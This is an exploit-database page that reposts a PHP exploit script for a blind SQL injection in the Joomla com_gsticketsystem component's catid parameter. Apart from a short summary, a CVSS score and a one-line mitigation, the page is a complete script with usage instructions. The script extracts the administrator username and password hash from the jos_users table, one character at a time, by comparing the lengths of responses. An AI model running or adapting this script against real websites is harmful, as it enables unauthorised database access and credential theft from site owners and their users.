header-logo
Suggest Exploit
vendor:
com_gsticketsystem
by:
Cyb3R-1sT
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: com_gsticketsystem
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: PHP
2020

Joomla com_gsticketsystem (catid) Blind SQL Injection Exploit

This exploit is used to gain access to the Joomla com_gsticketsystem (catid) by exploiting a blind SQL injection vulnerability. The exploit uses the 'catid' parameter to inject malicious SQL code into the database, which can then be used to extract the username and password of the user. The exploit is written in PHP and can be used with the command line.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any SQL queries.
Source

Exploit-DB raw data:

<?php
ini_set("max_execution_time",0);
print_r('
##############################################################################
#
#         Joomla com_gsticketsystem (catid) Blind SQL Injection Exploit
#
#                             ===  Cyb3R-1sT  ===
#                        cyb3r-1st [at] hormail.com
#                               inject0r5 t3am 
#
#                                  : Usage :
# php file.php "http://site/index.php?option=com_gsticketsystem&controller=entrypoint&task=viewCategory&catid=2"
#
#                                : Sp.GrEetZ :
#       [ All friends ] & [ 7rs.org ] & [ tryag.com] & [ sec-code.com ] 
#
##############################################################################
');
if ($argc > 1) {
$url = $argv[1];
$r = strlen(file_get_contents($url."+and+1=1--"));
echo "\nExploiting:\n";
$w = strlen(file_get_contents($url."+and+1=0--"));
$t = abs((100-($w/$r*100)));
echo "Username: ";
for ($i=1; $i <= 30; $i++) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--"));
   if (abs((100-($laenge/$r*100))) > $t-1) {
      $count = $i;
      $i = 30;
   }
}
for ($j = 1; $j < $count; $j++) {
   for ($i = 46; $i <= 122; $i=$i+2) {
      if ($i == 60) {
         $i = 98;
      }
      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
      if (abs((100-($laenge/$r*100))) > $t-1) {
         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
         if (abs((100-($laenge/$r*100))) > $t-1) {
            echo chr($i-1);
         } else {
            echo chr($i);
         }
         $i = 122;
      }
   }
}
echo "\nPassword: ";
for ($j = 1; $j <= 49; $j++) {
   for ($i = 46; $i <= 102; $i=$i+2) {
      if ($i == 60) {
         $i = 98;
      }
      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
      if (abs((100-($laenge/$r*100))) > $t-1) {
         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
         if (abs((100-($laenge/$r*100))) > $t-1) {
            echo chr($i-1);
         } else {
            echo chr($i);
         }
         $i = 102;
      }
   }
}
} 
?>

# milw0rm.com [2009-05-19]

Navigation

Suggest Exploit

Services By CQR